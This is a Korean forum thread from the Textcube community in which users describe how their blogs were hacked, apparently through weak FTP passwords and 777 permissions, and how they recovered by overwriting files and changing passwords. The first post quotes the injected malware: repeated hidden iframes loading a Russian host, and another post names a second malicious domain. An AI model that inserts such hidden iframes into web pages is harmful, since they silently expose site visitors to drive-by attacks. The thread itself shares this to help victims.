아직 로그인하지 않았습니다. 로그인 또는 회원 등록을 해 주시기 바랍니다.

안내

글을 찾기 위한 검색 메뉴는 바로 위 메뉴의 '회원 명단' 옆에 있습니다~
TNF는 회사가 아니라 오픈소스 커뮤니티입니다. textcube.org 는 회사에서 운영하는 서비스가 아니라, 커뮤니티에서 개발하는 소프트웨어입니다.
(2007.1.10) TNF는 해당 포럼 및 위키, trac 저장소상에서 이메일 수집을 금지합니다. 해당 공지 를 포럼 하단에 명기하였습니다.
(2007.2.9) TNF와 태터툴즈/텍스트큐브 코드 수정에 관한 workflow를 정리하였습니다. 안내
(2007.4.5) 공식 소스 버그 리포터 그룹의 일원이 되어주실 분들을 찾습니다. :) 관련 공지

최근소식

(2016.1.18) 텍스트큐브 1.10.9 의 첫 베타 버전을 배포합니다. 내려받기
(2015.11.19) 텍스트큐브 1.10.8 : Tempo primo를 배포합니다. 내려받기
(2015.7.9) 텍스트큐브 1.10.8의 첫번째 발표 후보를 배포합니다. 내려받기
(2015.6.4) 텍스트큐브 1.10.7 : Tempo primo를 배포합니다. 내려받기

포럼 내용 넘어가기

TNF : Tatter Network Foundation forum

태터 네트워크 재단 - 태터앤프렌즈 포럼입니다 :)


새 댓글 쓰기

새 댓글 쓰기

새 댓글 쓰기

사용할 수 있는 기능: BBCode 이미지 웃음그림

입력을 마치기 전에 (필수) 로 명기된 부분은 모두 적어 주셔야 합니다.

방문자의 경우 필요한 정보



Captcha image. Turn pictures on to see it.
필요한 정보
선택사항설정

주제 보기 (새 글 순)

6

흐음 보안 안내를 통해 777 퍼미션을 변경하도록 하는 부분을 안내해야겠네요.^^

그런데 파일은 쓰기 권한이 없을텐데 어떤 방법을 썼을까요? 흠... 역으로 한 번 생각을 해 봐야겠네요;

혹시 서버에 indexes 옵션이 켜져 있으면 리스트를 바로 볼 수 있을 것 같기도 하고...

5

텍스트큐브에서 블로그 소스 받아서 간편하게 복원하고

FTP 비번 어렵게(특수문자포함) 변경하면됩니다

루트의 index.php 와 플러그인 폴더 덮어쓰기하고

index.gif.php
파일 찾아서....이건 어딨는지 찾느거 귀찮아서 저는 어땟치 폴더 빼고 그냥 덮어쓰기했습니다

아니면

기존의 소스 하드로 복사해서
탐색기에서 index.* 로 검색후 일일이 수정하면되는데
어떤 분은 소스가 변경되었다하니 그냥 덮어쓰기하는게 편할 것 같습니다

실질적으로 FTP 계정으로 들어와서 해킹하는거니

비밀번호 변경하세요  어렵게...........

4

역시 서버를 하나 받는게 속편한듯....

3

저도 오늘 당했습니다
index파일마다 iframe가 들어가면서 파일 내용도 일부 지워졌네요
전 t-age.ru:8080 이런 링크가 들어갔습니다

가비아에 연락해보니 누군가 ftp로 접속했다는데 전부 아이피가 다르다네요
아무래도 해킹툴로 접속되었나봅니다

2

사실상 권한문제로 해킹의 노출이 되는건 사실이지만,
그렇게 쉽게 된다는건 호스팅 업체의 보안 문제가 더 크다고 봅니다.
그렇다면, 텍스트큐브뿐만이 아닌 흔한 xe나 z보드 등의 777의 여견을 쓰는 여타의 웹프로그램 모두 다 그렇겠죠.

1

<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div><div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>

해킹당하면 본문에 이런게 소스가 있고 하얗게 보입니다/

index.php 에 아이프레미으로 위 소스가 하나 삽입됩니다.

http://domain.com
http://domain.com/blog
첫 번째 루트에 설치하면서 퍼미션을 777, 707 로 주면 100%로 해킹 당합니다.
초기 설치시 777로 변경하라고 하기에..
장기적으로 777로 변경하고 다시 변경 안한 곳은 100%로 해킹 당합니다.

2곳에 호스팅 서비스를 받는데/  6시간 안에 같은 방식으로 해킹 당했습니다.



Currently installed 7 official extensions. Copyright © 2003–2009 PunBB.